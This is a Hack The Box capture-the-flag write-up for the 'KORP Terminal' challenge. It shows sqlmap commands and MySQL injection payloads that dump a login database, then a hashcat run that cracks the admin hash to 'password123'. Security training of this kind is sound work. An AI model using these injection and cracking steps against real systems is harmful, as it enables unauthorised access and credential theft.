HackTheBox KORP Terminal Challenge

Explore the basics of cybersecurity in the KORP Terminal Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/647

Description#

Your faction must infiltrate the KORP™ terminal and gain access to the Legionaries’ privileged information and find out more about the organizers of the Fray. The terminal login screen is protected by state-of-the-art encryption and security protocols.

Exploitation#

sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401

---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: username=a' RLIKE (SELECT (CASE WHEN (5665=5665) THEN 0x61 ELSE 0x28 END))-- Isul&password=a

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=a' OR (SELECT 8955 FROM(SELECT COUNT(*),CONCAT(0x7178716271,(SELECT (ELT(8955=8955,1))),0x717a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pzFe&password=a

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=a' AND (SELECT 1571 FROM (SELECT(SLEEP(5)))MEYL)-- abGQ&password=a
---

sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401 --dbs

sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401 -D korp_terminal --tables

sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401 -dump

Brute Force the Hash#

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt

this yelds password123 so admin:password123

Summary#

KORP Terminal exploits an SQL injection vulnerability using sqlmap to enumerate the korp_terminal database, extract credentials, and crack the admin password (password123) with hashcat. The credentials are then used to access the flag, highlighting risks in poorly sanitized inputs and insecure SQL queries.